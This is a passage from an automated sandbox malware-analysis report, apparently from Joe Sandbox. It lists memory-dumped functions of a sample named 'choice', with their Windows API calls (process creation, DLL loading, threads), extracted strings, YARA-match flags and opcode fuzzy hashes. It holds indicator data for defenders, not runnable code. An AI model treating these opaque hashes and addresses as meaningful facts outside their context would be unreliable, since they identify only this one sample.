                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 5dbf0d6f063e496f5936fd134c5c24554e227adf92e0014bfd555d6b9d0e740f
                                                                                                              • Instruction ID: a45e1e08febbed50dd59d25e0310d81ec9175f77a6d652a802666e6c2d55270c
                                                                                                              • Opcode Fuzzy Hash: 5dbf0d6f063e496f5936fd134c5c24554e227adf92e0014bfd555d6b9d0e740f
                                                                                                              • Instruction Fuzzy Hash: F59002A120340003610571584414616400E8BF0205B96C025E5025590DC529D9916125
                                                                                                              Function 04A535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 57c9475a65f70e558e7824ec5e56d992ac9d7c8b734b13922f4afc110a0b474b
                                                                                                              • Instruction ID: 0e50c27cca5bc8807d78e8ef31f7e8d17567635fd66ac45e3c6b34a34974db67
                                                                                                              • Opcode Fuzzy Hash: 57c9475a65f70e558e7824ec5e56d992ac9d7c8b734b13922f4afc110a0b474b
                                                                                                              • Instruction Fuzzy Hash: CA90027160650402F1007158451470610098BE0205FA6C415A4435568D8799DA5165A2
                                                                                                              Function 02B23EC0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 02B23F9B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                              • Opcode ID: 742426b363c3a4985e7053ea838ac46b49b27e5a96ce05452ed9318196b12e4f
                                                                                                              • Instruction ID: 307610745aaeb68374e1cae2e5127dd2dfbf7e5ae403fac3c8762da2f968877a
                                                                                                              • Opcode Fuzzy Hash: 742426b363c3a4985e7053ea838ac46b49b27e5a96ce05452ed9318196b12e4f
                                                                                                              • Instruction Fuzzy Hash: B331B0B1A00705BBC724DFA4DC84FEBB7B9EB88710F108599EA1D6B244C7746644CFA5
                                                                                                              Function 02B1F910 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InitializeUninitialize
                                                                                                              • String ID: @J7<
                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                              • Opcode ID: 918046811ed64c94dbddd3df9ab812e798a9e98e6d60eddd0bbe2c6f9faed9e4
                                                                                                              • Instruction ID: 28508ccb390eb98c1ada67da912d4573075cb05a12e93792fa147caff6f97f1b
                                                                                                              • Opcode Fuzzy Hash: 918046811ed64c94dbddd3df9ab812e798a9e98e6d60eddd0bbe2c6f9faed9e4
                                                                                                              • Instruction Fuzzy Hash: A9312FB5A0030AAFDB00DFD8D8809EEB7B9FF88304B508599E515EB254D775EE45CBA0
                                                                                                              Function 02B149FA Relevance: 1.6, APIs: 1, Instructions: 66libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02B149D2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: 31f813af035243cd26d958f17192baafba51a5d628c02dc63890d59a6f01c254
                                                                                                              • Instruction ID: b4d6c433c80934b77ec1eff2f4bc777185c895e3b8939116aa2db592048c6853
                                                                                                              • Opcode Fuzzy Hash: 31f813af035243cd26d958f17192baafba51a5d628c02dc63890d59a6f01c254
                                                                                                              • Instruction Fuzzy Hash: 52115C3150564AAFCF01EAB8D845FDDFBB1FB44308F6442D9D694C6147E3309256CB86
                                                                                                              Function 02B14A11 Relevance: 1.6, APIs: 1, Instructions: 53libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02B149D2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: 645277cc62aa2590a508ffeef2e8a041cefc4593994317a5588ae8f89b77937b
                                                                                                              • Instruction ID: bd50eb3e178f2854775b4132cabb2c722233b71e076f497e3abf843c9940b4e4
                                                                                                              • Opcode Fuzzy Hash: 645277cc62aa2590a508ffeef2e8a041cefc4593994317a5588ae8f89b77937b
                                                                                                              • Instruction Fuzzy Hash: 6501F7B580060AEFCF00EEB8D985FDCBBF1FB15308F144698DA4497146E731A655CB82
                                                                                                              Function 02B14960 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02B149D2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: 169300342ec012082af8d9fc994880b487080d55fc2ea02b2f42f86782b7218c
                                                                                                              • Instruction ID: 4b279a6423419e7ed5122224d054b4ed59277ce6def7fa2c8cdb982df9dce0d0
                                                                                                              • Opcode Fuzzy Hash: 169300342ec012082af8d9fc994880b487080d55fc2ea02b2f42f86782b7218c
                                                                                                              • Instruction Fuzzy Hash: 55011EB5D0020DABDF10EAA4DC41F9EB779AB44308F1041D5AA0C97245F631E718CB91
                                                                                                              Function 02B29D00 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,02B1870E,00000010,?,?,?,00000044,?,00000010,02B1870E,?,?,?), ref: 02B29D63
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateInternalProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 2186235152-0
                                                                                                              • Opcode ID: 588ab6fad6ad697c7db8fb2378a5e212ec811c9a1e7c0e8cc65acac0753f6f99
                                                                                                              • Instruction ID: 6015575ce1c71d77f93116d17c331716f365d260bee004c202be128c6286c54c
                                                                                                              • Opcode Fuzzy Hash: 588ab6fad6ad697c7db8fb2378a5e212ec811c9a1e7c0e8cc65acac0753f6f99
                                                                                                              • Instruction Fuzzy Hash: 420192B2215108BBDB44DE9DDC90EEB77AEAF8C754F008649FA1DE3240D630F8518BA4
                                                                                                              Function 02B09CB0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02B09CF5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2422867632-0
                                                                                                              • Opcode ID: af7759501880bc2f0e24560c58caa6f546800790529d4b74ef37cf20f0e0dff1
                                                                                                              • Instruction ID: 00677e281635f3c55cf76bda9990bcd86c200223525ae640eccf23cf21709ef2
                                                                                                              • Opcode Fuzzy Hash: af7759501880bc2f0e24560c58caa6f546800790529d4b74ef37cf20f0e0dff1
                                                                                                              • Instruction Fuzzy Hash: F7F0657338071436E72162ED9C02FDB778DCBC1B71F154156FA0CDA1C0D596B40586A4
                                                                                                              Function 02B1874A Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 02B1877C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: 50468426bb84eebf377670c1fec5e705ddcc3463769bde6e85eed78acffa404d
                                                                                                              • Instruction ID: a3ca8917a31836c6460c27f79d4d952a9ccf866ca28182a9eee12a23ff7921d6
                                                                                                              • Opcode Fuzzy Hash: 50468426bb84eebf377670c1fec5e705ddcc3463769bde6e85eed78acffa404d
                                                                                                              • Instruction Fuzzy Hash: EBE0D17624070437F711A96CDC81F663715EF4A734FAD46D0B928CF1D6D729E40185A1
                                                                                                              Function 02B29C80 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,6ED9EBA1,00000007,00000000,00000004,00000000,02B141DA,000000F4), ref: 02B29CB9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0
                                                                                                              • Opcode ID: 851142cb7fa9c83753263c3c10c1740acc6173fb79af0817dc9ff9eee6ffe6a5
                                                                                                              • Instruction ID: 7f21c7f8718dfb54292dc2da75327fbaaa3ba3ede963ad1a3d7a7ac58535bb5c
                                                                                                              • Opcode Fuzzy Hash: 851142cb7fa9c83753263c3c10c1740acc6173fb79af0817dc9ff9eee6ffe6a5
                                                                                                              • Instruction Fuzzy Hash: A8E09A722002047BCA14EE59EC44FDF77ADEFC8710F004408FA08A7280CA30B914CBB4
                                                                                                              Function 02B29C30 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(02B11E16,?,02B25ADF,02B11E16,02B25ABF,02B25ADF,?,02B11E16,02B25ABF,00001000,?,?,00000000), ref: 02B29C6C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: fc17c7c206684ab0106122256be8546507daf1ce0ff0ed4a555c94f2499e0637
                                                                                                              • Instruction ID: d13c8f169d78aa485e433d52a0100bad71cb751704fe795eb62e67096825c48d
                                                                                                              • Opcode Fuzzy Hash: fc17c7c206684ab0106122256be8546507daf1ce0ff0ed4a555c94f2499e0637
                                                                                                              • Instruction Fuzzy Hash: FAE06572204304BBD614EE48EC41F9B77ADEF89B10F008009FA09A7280DA70B814CAB5
                                                                                                              Function 02B18750 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 02B1877C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: 0cfc8129ef7a1196aec510271a93c905f16c1314e6d802461c50461af26a7ec0
                                                                                                              • Instruction ID: 114d6502fb939ff92bd5896f83bdf8efd162254206cf4c284ad2cfc66ec8e02f
                                                                                                              • Opcode Fuzzy Hash: 0cfc8129ef7a1196aec510271a93c905f16c1314e6d802461c50461af26a7ec0
                                                                                                              • Instruction Fuzzy Hash: BFE086762407042BFB246AB8EC45F673359EF49728F6C4AA0B91CDB2C1E779F5118590
                                                                                                              Function 02B111FB Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(?,00000111), ref: 02B11207
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 1836367815-0
                                                                                                              • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                              • Instruction ID: 8d4107bc6148c92abd7c4c2c052ae555a335ff4e568f5912659e528a50218c77
                                                                                                              • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                              • Instruction Fuzzy Hash: E3D0237774000C75A60145C46CC1DFFB75CDB845A5F004063FF0CD1040D6214D020BF0
                                                                                                              Function 02B18540 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02B12110,02B2840F,02B25ABF,02B120D6), ref: 02B18573
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              • Opcode ID: 1bff03101fdcb0ec3fbfdba4c633dd8972d786da86e894c1965261f6565ee6b0
                                                                                                              • Instruction ID: 7bbea3bb196457c1431b590fb7c9326d49adeb6e19604fa2998d3c57c957f7ca
                                                                                                              • Opcode Fuzzy Hash: 1bff03101fdcb0ec3fbfdba4c633dd8972d786da86e894c1965261f6565ee6b0
                                                                                                              • Instruction Fuzzy Hash: 47D05E75A807043BF604A6F88C02F573A8FDB44754F4480A4BA0CE73C2E955F5004A65
                                                                                                              Function 02B1853F Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02B12110,02B2840F,02B25ABF,02B120D6), ref: 02B18573
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_2b00000_choice.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              • Opcode ID: cf76302b5712ce6ab0876e5ea568d78abd64ec5e0036f82a752503aef8af8194
                                                                                                              • Instruction ID: e2a5040b747d79ccab96a47eb53c97cfc8303e35542b1e4b72a97db41664b267
                                                                                                              • Opcode Fuzzy Hash: cf76302b5712ce6ab0876e5ea568d78abd64ec5e0036f82a752503aef8af8194
                                                                                                              • Instruction Fuzzy Hash: AEE02B628843403BEB00A7B15D0F70A7E46FF00311F484AECE40CEF083DA1CC1008612
                                                                                                              Function 04A52C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 17bb4edaf653c4a597dc1ff7bdb254d8f9b6b5017c0602b289fe9c3b038c0fec
                                                                                                              • Instruction ID: 344d2426dd598a1a8bd51ec5d042f30281465be1cc875c37e15c98166b84436c
                                                                                                              • Opcode Fuzzy Hash: 17bb4edaf653c4a597dc1ff7bdb254d8f9b6b5017c0602b289fe9c3b038c0fec
                                                                                                              • Instruction Fuzzy Hash: 5BB09B729025C5C5FB11F760470871779146BD0705F56C075D6030642F473CD5D1E575

                                                                                                              Non-executed Functions

                                                                                                              Function 048CDDD9 Relevance: 56.5, Strings: 45, Instructions: 213COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951551008.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_48c0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                              • API String ID: 0-3558027158
                                                                                                              • Opcode ID: bf37c6b5e2b88f16f0fe8e46c61588e16d473187dbc1e56eb2a78c11a0d15657
                                                                                                              • Instruction ID: 822309b800dd58add04b98db84c548c209b8611973cac1cd2174de53cd3ce488
                                                                                                              • Opcode Fuzzy Hash: bf37c6b5e2b88f16f0fe8e46c61588e16d473187dbc1e56eb2a78c11a0d15657
                                                                                                              • Instruction Fuzzy Hash: 9D9141F04482988EC7158F54A0652AFFFB1EBC6305F15856DE7E6BB243C3BE89058B85
                                                                                                              Function 048C3A89 Relevance: 32.6, Strings: 26, Instructions: 62COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951551008.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_48c0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (,/2$)/+2$)2,<$*(5<$*2-'$-,+<$/*<4$/+2/$2,2.$4Kur$<KSK$<RH<$O}z}$P0<p$Qsfu$WTHQ$Wuh3$]llp$nu3)$pp}3$s5<_$tnsq$uwy<$xsko$y3(($yKy~
                                                                                                              • API String ID: 0-2078937982
                                                                                                              • Opcode ID: 0d374fce451b3cb1192ed2ad3dab81be0fa4e91a4b9c66adf51a687bb18a52be
                                                                                                              • Instruction ID: 8416ac5f4f25fb582699b24491fc8cbb11048a276362b839dea255eb6c38e9a9
                                                                                                              • Opcode Fuzzy Hash: 0d374fce451b3cb1192ed2ad3dab81be0fa4e91a4b9c66adf51a687bb18a52be
                                                                                                              • Instruction Fuzzy Hash: 0E2153B044074CDBDF04EF85E590ADD7B70FF01304F90A25EE808AE254DA318A568B89
                                                                                                              Function 04A52890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 93639ff8d4c7d2cfaa51185dd954e4be91a4ad61ebf5742e8f57a9f8fab4536c
                                                                                                              • Instruction ID: 7248f1f08e302a3e0b3596fd1bbd63d15bd442d8d6baa69292c0925a5e3be7c0
                                                                                                              • Opcode Fuzzy Hash: 93639ff8d4c7d2cfaa51185dd954e4be91a4ad61ebf5742e8f57a9f8fab4536c
                                                                                                              • Instruction Fuzzy Hash: FD51D8B6B04116BFDB15DF989A90A7EF7B8FB48304714816AE865D7641E234FE408FE0
                                                                                                              Function 04AC2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 01487c086332fd58d8a200888f78020919b5adf3c142ef0cb06b3ced4a9e333f
                                                                                                              • Instruction ID: 5bea59f939e968452fed3aa86b3070d588e56cfbc063110dcf5f1800b83acfc6
                                                                                                              • Opcode Fuzzy Hash: 01487c086332fd58d8a200888f78020919b5adf3c142ef0cb06b3ced4a9e333f
                                                                                                              • Instruction Fuzzy Hash: B751E776E00649AFDB70DF5CC990A7FB7F9EB48304B0484AEE496D7681E674FA408760
                                                                                                              Function 04A47630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 04A84787
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04A84725
                                                                                                              • ExecuteOptions, xrefs: 04A846A0
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04A84655
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04A84742
                                                                                                              • Execute=1, xrefs: 04A84713
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04A846FC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: 90200588998b865d7d74460ae5664d0542376a84b20049342f9aa3d99b7d673e
                                                                                                              • Instruction ID: 7e62814a75d5b5fc3ef6a28511ca562bffbc10b504256761c595ceb18efac433
                                                                                                              • Opcode Fuzzy Hash: 90200588998b865d7d74460ae5664d0542376a84b20049342f9aa3d99b7d673e
                                                                                                              • Instruction Fuzzy Hash: 0F510775600259BBEF10AFA4DD85FAE77B9EFC8304F4404A9E505AB190EB70BE458F60
                                                                                                              Function 04AE6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
